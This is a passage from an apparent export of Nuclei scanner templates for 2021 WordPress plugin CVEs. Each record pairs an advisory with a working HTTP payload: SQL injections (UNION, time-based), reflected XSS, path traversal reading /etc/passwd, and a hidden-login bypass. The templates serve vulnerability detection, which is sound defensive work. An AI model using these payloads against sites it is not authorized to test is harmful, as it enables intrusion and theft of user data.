cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: elementor\n product: website_builder\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,elementor,wpscan,dom,xss\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/elementor/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Elementor Website Builder'\n\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js\"\n - \"{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9\"\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200\n\n - type: regex\n part: body_1\n regex:\n - \"elementor[\\\\s-]*v(([0-3]+\\\\.(([0-5]+\\\\.[0-5]+)|[0-4]+\\\\.[0-9]+))|[0-2]+[0-9.]+)\"\n\n extractors:\n - type: regex\n name: version\n group: 1\n regex:\n - \"elementor[\\\\s-]*v(([0-3]+\\\\.(([0-5]+\\\\.[0-5]+)|[0-4]+\\\\.[0-9]+))|[0-2]+[0-9.]+)\"\n internal: true\n\n - type: kval\n kval:\n - version\n# digest: 490a0046304402205b282380b349f854fb682c0a9e29f9260987ccc282a94ff7317206ba7e3d03db022055093df9a46c6e757eac59c584cb657f373924eae480a7af9c82cf24c168f3a8:922c64590222798bb761d5b6d8e72950", "hash": "edddbfb037aede9dae2076ad4a9d85e8", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d6" }, "name": "CVE-2021-24910.yaml", "content": "id: CVE-2021-24910\n\ninfo:\n name: WordPress Transposh Translation <1.0.8 - Cross-Site Scripting\n author: Screamy\n severity: medium\n description: WordPress Transposh Translation plugin before 1.0.8 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the a parameter via an AJAX action (available to both unauthenticated and authenticated users when the curl library is installed) before outputting it back in the response.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Update the WordPress Transposh Translation plugin to version 1.0.8 or later to mitigate the vulnerability.\n reference:\n - https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/\n - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-24910.txt\n - https://wpscan.com/vulnerability/b5cbebf4-5749-41a0-8be3-3333853fca17\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24910\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24910\n cwe-id: CWE-79\n epss-score: 0.00086\n epss-percentile: 0.35299\n cpe: cpe:2.3:a:transposh:transposh_wordpress_translation:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: transposh\n product: transposh_wordpress_translation\n framework: wordpress\n tags: cve2021,cve,wordpress,wp-plugin,xss,wp,wpscan,transposh\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - '{\"result\":'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d37fe0b4e214f6873d85a658650c7498aebf4e3ab8c22a05b2f65796d3e8928c022012536e11e361e1aee564b3dc6f01349c49f76792d86b982708b7c86bf3f3188f:922c64590222798bb761d5b6d8e72950", "hash": "8130a2ebff1bc42cb072c437c11acca2", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d7" }, "name": "CVE-2021-24915.yaml", "content": "id: CVE-2021-24915\n\ninfo:\n name: Contest Gallery < 13.1.0.6 - SQL injection\n author: r3Y3r53\n severity: critical\n description: |\n The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address.\n remediation: Fixed in version 13.1.0.6\n reference:\n - https://wpscan.com/vulnerability/45ee86a7-1497-4c81-98b8-9a8e5b3d4fac\n - https://gist.github.com/tpmiller87/6c05596fe27dd6f69f1aaba4cbb9c917\n - https://wordpress.org/plugins/contest-gallery/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24915\n cwe-id: CWE-89\n epss-score: 0.22351\n epss-percentile: 0.96057\n cpe: cpe:2.3:a:contest_gallery:contest_gallery:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: contest_gallery\n product: contest_gallery\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/contest-gallery/\"\n tags: cve2021,cve,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery,sqli\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'WpUserId'\n - 'Username'\n - 'Usermail'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/csv'\n - 'filename='\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220029f49c1e9fa65765eaed8f0325876a75a3da15cad0b9597a1e000f69de3c11f0221008d79ba2600b7e68952c628b0a919d453f58c97dfbc68070006af2ede9825963b:922c64590222798bb761d5b6d8e72950", "hash": "bec4ec6fccc8421a0e63474dde53a546", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d8" }, "name": "CVE-2021-24917.yaml", "content": "id: CVE-2021-24917\n\ninfo:\n name: WordPress WPS Hide Login <1.9.1 - Information Disclosure\n author: akincibor\n severity: high\n description: WordPress WPS Hide Login plugin before 1.9.1 is susceptible to incorrect authorization. An attacker can obtain the secret login page by setting a random referer string and making a request to /wp-admin/options.php as an unauthenticated user. This reveals the secret login location.\n impact: |\n An attacker can gain sensitive information about the WordPress site, such as the login page URL.\n remediation: Fixed in version 1.9.1.\n reference:\n - https://wpscan.com/vulnerability/15bb711a-7d70-4891-b7a2-c473e3e8b375\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24917\n - https://wordpress.org/support/topic/bypass-security-issue/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-24917\n cwe-id: CWE-863\n epss-score: 0.03563\n epss-percentile: 0.90675\n cpe: cpe:2.3:a:wpserveur:wps_hide_login:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wpserveur\n product: wps_hide_login\n framework: wordpress\n tags: cve2021,cve,wp,wordpress,wp-plugin,unauth,wpscan,wpserveur\n\nhttp:\n - raw:\n - |\n GET /wp-admin/options.php HTTP/1.1\n Host: {{Hostname}}\n Referer: something\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"!contains(tolower(location), 'wp-login.php')\"\n\n - type: word\n part: header\n words:\n - 'redirect_to=%2Fwp-admin%2Fsomething&reauth=1'\n\n extractors:\n - type: kval\n kval:\n - location\n# digest: 4b0a00483046022100aa02258a3fe31969b26abef88381abc8502bee1888b8beaa33762c32b70968cf0221008b4c288173be99e17f8cbfc8dec7f1a886966396d1bc254fb80b1ba526800975:922c64590222798bb761d5b6d8e72950", "hash": "f03e838df507d9ef2e16facfe0fd9b29", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082d9" }, "name": "CVE-2021-24926.yaml", "content": "id: CVE-2021-24926\n\ninfo:\n name: WordPress Domain Check <1.0.17 - Cross-Site Scripting\n author: cckuailong\n severity: medium\n description: WordPress Domain Check plugin before 1.0.17 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the domain parameter before outputting it back in the page.\n remediation: |\n Update to WordPress Domain Check plugin version 1.0.17 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24926\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24926\n cwe-id: CWE-79\n epss-score: 0.00171\n epss-percentile: 0.53153\n cpe: cpe:2.3:a:domaincheckplugin:domain_check:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: domaincheckplugin\n product: domain_check\n framework: wordpress\n tags: cve,cve2021,wpscan,xss,wp,wordpress,wp-plugin,authenticated,domaincheckplugin\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"Domain Check\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d0f4d9bfcc048f509d4adc32bc55b484ffb0c20b4119b906aae940c8cd858c120220778eacf2b57cdec131c557397df891c5923101ad74b0501c14fcd71964089258:922c64590222798bb761d5b6d8e72950", "hash": "2410844c798338b5777f26cc4dba0160", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082da" }, "name": "CVE-2021-24931.yaml", "content": "id: CVE-2021-24931\n\ninfo:\n name: WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress Secure Copy Content Protection and Content Locking plugin before 2.8.2 contains a SQL injection vulnerability. The plugin does not escape the sccp_id parameter of the ays_sccp_results_export_file AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.\n remediation: Fixed in version 2.8.2.\n reference:\n - https://wpscan.com/vulnerability/1cd52d61-af75-43ed-9b99-b46c471c4231\n - https://wordpress.org/plugins/secure-copy-content-protection/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24931\n - http://packetstormsecurity.com/files/165946/WordPress-Secure-Copy-Content-Protection-And-Content-Locking-2.8.1-SQL-Injection.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24931\n cwe-id: CWE-89\n epss-score: 0.58114\n epss-percentile: 0.97428\n cpe: cpe:2.3:a:ays-pro:secure_copy_content_protection_and_content_locking:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: ays-pro\n product: secure_copy_content_protection_and_content_locking\n framework: wordpress\n tags: cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro\n\nhttp:\n - raw:\n - |\n @timeout: 20s\n GET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"{\\\"status\\\":true\")'\n condition: and\n# digest: 4b0a00483046022100bd6a79cdc594a3023fb8e143f8b3806237e2d1b610802729545d42772e7340e10221008215d1a8a12f869971241e710ddfd7c6f663f9e5a94326ce397d081c4f966528:922c64590222798bb761d5b6d8e72950", "hash": "1e7ceaec565d084ec89125978c35bbd2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082db" }, "name": "CVE-2021-24940.yaml", "content": "id: CVE-2021-24940\n\ninfo:\n name: WordPress Persian Woocommerce <=5.8.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: |\n WordPress Persian Woocommerce plugin through 5.8.0 contains a cross-site scripting vulnerability. The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site and possibly steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in 5.9.8.\n reference:\n - https://wpscan.com/vulnerability/1980c5ca-447d-4875-b542-9212cc7ff77f\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24940\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24940\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42899\n cpe: cpe:2.3:a:woocommerce:persian-woocommerce:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: woocommerce\n product: persian-woocommerce\n framework: wordpress\n tags: cve2021,cve,wp,xss,authenticated,wpscan,wordpress,wp-plugin,woocommerce\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - contains(header_2, \"text/html\")\n - status_code_2 == 200\n - contains(body_2, 'accesskey=X onclick=alert(1) test=')\n - contains(body_2, 'woocommerce_persian_translate')\n condition: and\n# digest: 4b0a00483046022100b7047b7f826c9feeea2a1e804ec10dee788c3f73bf6a15b7f203b50f4b63af08022100b8021e9cb1d934188fbe23f2ce21be31736eec16f8f4d29453819a12fab97e43:922c64590222798bb761d5b6d8e72950", "hash": "a25cb865a8dae3f8bae62a683e9794ad", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082dc" }, "name": "CVE-2021-24943.yaml", "content": "id: CVE-2021-24943\n\ninfo:\n name: Registrations for the Events Calendar < 2.7.6 - SQL Injection\n author: ritikchaddha\n severity: critical\n description: |\n The Registrations for the Events Calendar WordPress plugin before 2.7.6 does not sanitise and escape the event_id in the rtec_send_unregister_link AJAX action (available to both unauthenticated and authenticated users) before using it in a SQL statement, leading to an unauthenticated SQL injection.\n remediation: Fixed in 2.7.6\n reference:\n - https://wpscan.com/vulnerability/ba50c590-42ee-4523-8aa0-87ac644b77ed/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24943\n - https://wordpress.org/plugins/registrations-for-the-events-calendar/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24943\n cwe-id: CWE-89\n epss-score: 0.21158\n epss-percentile: 0.96299\n cpe: cpe:2.3:a:roundupwp:registrations_for_the_events_calendar:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: roundupwp\n product: registrations_for_the_events_calendar\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/registrations-for-the-events-calendar/\"\n tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar\nvariables:\n text: \"{{rand_base(5)}}\"\n\nhttp:\n - raw:\n - |\n @timeout: 20s\n POST /wp-admin/admin-ajax.php?action=rtec_send_unregister_link HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n event_id=3 AND (SELECT 1874 FROM (SELECT(SLEEP(5)))vNpy)&email={{text}}@{{text}}.com\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=5'\n - 'status_code == 200'\n - 'contains(body, \"Please enter the email you registered with\")'\n condition: and\n# digest: 4b0a00483046022100b80877af0947d3a8a37e4c34281cf76f8f00154d90974a6dd87bf80d91980837022100eabb89ae18f62fe2508c9fdc28dc7316c524d8dc3a6d1cd28f28d8cc14f0b9f8:922c64590222798bb761d5b6d8e72950", "hash": "cfce3c4a938f95ae6d5c074d0366a1d5", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082dd" }, "name": "CVE-2021-24946.yaml", "content": "id: CVE-2021-24946\n\ninfo:\n name: WordPress Modern Events Calendar <6.1.5 - Blind SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.\n remediation: |\n Upgrade to WordPress Modern Events Calendar version 6.1.5 or later to mitigate this vulnerability.\n reference:\n - https://wpscan.com/vulnerability/09871847-1d6a-4dfe-8a8c-f2f53ff87445\n - https://wordpress.org/plugins/modern-events-calendar-lite/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24946\n - http://packetstormsecurity.com/files/165742/WordPress-Modern-Events-Calendar-6.1-SQL-Injection.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-24946\n cwe-id: CWE-89\n epss-score: 0.12445\n epss-percentile: 0.94942\n cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: webnus\n product: modern_events_calendar_lite\n framework: wordpress\n tags: cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n GET /wp-admin/admin-ajax.php?action=mec_load_single_page&time=1))%20UNION%20SELECT%20sleep(6)%20--%20g HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200 || status_code == 500'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"The event is finished\") || contains(body, \"been a critical error\")'\n condition: and\n# digest: 4a0a004730450220639f36ec2923e5c1fa51bab912bd571fed2585b6cbe587796844a913eb606c6e022100d5fa2051f016ff2940ca7e37b26ed07563aa7272b2bc5f69a8a4b96dd0f549d3:922c64590222798bb761d5b6d8e72950", "hash": "136c0ea5d8745379eba5075dc1f1338f", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082de" }, "name": "CVE-2021-24947.yaml", "content": "id: CVE-2021-24947\n\ninfo:\n name: WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read\n author: cckuailong\n severity: medium\n description: WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server.\n impact: |\n An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information.\n remediation: |\n Update WordPress Responsive Vector Maps plugin to version 6.4.2 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24947\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/kazet/wpgarlic\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2021-24947\n cwe-id: CWE-352,CWE-863\n epss-score: 0.00315\n epss-percentile: 0.69672\n cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: thinkupthemes\n product: responsive_vector_maps\n framework: wordpress\n tags: cve2021,cve,authenticated,wpscan,lfi,wp,wordpress,wp-plugin,lfr,thinkupthemes\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008def46061f092b5a0c93c28264ab3a05066eaf001fe4abf17f6bb797222530eb02206027d16ad6b375a0bf8611d8873cea6d30f23a2c433cfcf607ec748b470ffabc:922c64590222798bb761d5b6d8e72950", "hash": "783e523c89213dd0df2e799d835e41d9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082df" }, "name": "CVE-2021-24956.yaml", "content": "id: CVE-2021-24956\n\ninfo:\n name: Blog2Social < 6.8.7 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 6.8.7\n reference:\n - https://wpscan.com/vulnerability/5882ea89-f463-4f0b-a624-150bbaf967c2\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24956\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24956\n cwe-id: CWE-79\n epss-score: 0.00106\n epss-percentile: 0.42122\n cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: adenion\n product: blog2social\n framework: wordpress\n tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan,adenion\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=blog2social&b2sShowByDate=\"> HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\" name='\n - 'Your Activity'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ec04e3dad8ad65b066274ccd4a8a113b5ea1b447ef8a8ec31cda043e7556215b022048581b99f01c99ffc5343a1654aeb5b223cee073de6650038918f6053e24675b:922c64590222798bb761d5b6d8e72950", "hash": "09ef8b019cc1f7aa3916e4d4b26b40df", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e0" }, "name": "CVE-2021-24970.yaml", "content": "id: CVE-2021-24970\n\ninfo:\n name: WordPress All-In-One Video Gallery <2.5.0 - Local File Inclusion\n author: r3Y3r53\n severity: high\n description: |\n WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.\n remediation: Fixed in version 2.5.4.\n reference:\n - https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10\n - https://wordpress.org/plugins/all-in-one-video-gallery\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24970\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2021-24970\n cwe-id: CWE-22\n epss-score: 0.03639\n epss-percentile: 0.90767\n cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: plugins360\n product: all-in-one_video_gallery\n framework: wordpress\n tags: cve2021,cve,wpscan,wp,wp-plugin,wordpress,lfi,authenticated,plugins360\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=all-in-one-video-gallery&tab=..%2F..%2F..%2F..%2F..%2Findex HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"All-in-One Video Gallery\")'\n - 'contains(body_2, \"Hello world!\")'\n - 'contains(body_2, \"Welcome to WordPress\")'\n condition: and\n# digest: 4a0a00473045022100b5d1766bc6648351452ccabff49a901fdcee3d82c63473eb3f7da8360ad1a0f802201b2b426c71f82735e56341c6b3a49558a74a3e6d0a936e46a2d1c375a0d2dffc:922c64590222798bb761d5b6d8e72950", "hash": "38fe2c99f9ca7ca592ff720a7fa38bff", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e1" }, "name": "CVE-2021-24979.yaml", "content": "id: CVE-2021-24979\n\ninfo:\n name: Paid Memberships Pro < 2.6.6 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The Paid Memberships Pro WordPress plugin before 2.6.6 does not escape the s parameter before outputting it back in an attribute in an admin page, leading to a Reflected Cross-Site Scripting\n remediation: version 2.6.6\n reference:\n - https://wpscan.com/vulnerability/fc011990-4ec1-4553-901d-4ff1f482cb79\n - https://nvd.nist.gov/vuln/detail/CVE-2021-24979\n - https://plugins.trac.wordpress.org/changeset/2632369/paid-memberships-pro/tags/2.6.6/adminpages/discountcodes.php\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-24979\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40832\n cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: strangerstudios\n product: paid_memberships_pro\n framework: wordpress\n publicwww-query: /wp-content/plugins/paid-memberships-pro/\n tags: cve2021,cve,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=pmpro-discountcodes&s=s\"+style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"style=animation-name:rotation+onanimationstart=alert(document.domain)//\")'\n - 'contains(body_2, \"Paid Memberships Pro - Membership Plugin for WordPress\")'\n condition: and\n# digest: 4a0a0047304502204c311ac0221f929a6e40782a29c695f3b9f8f53fdb8540c1a50f006d72c4665f022100bfbd6264919d48a0a9046f8c4b2fc16c812b6b9713d44a254f19dd0c43a97101:922c64590222798bb761d5b6d8e72950", "hash": "5ee2019e8ce057c112021a7371153c15", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf3082e2" }, "name": "CVE-2021-24987.yaml", "content": "id: CVE-2021-24987\n\ninfo:\n name: WordPress Super Socializer <7.13.30 - Cross-Site Scripting\n author: Akincibor\n severity: medium\n description: WordPress Super Socializer plugin before 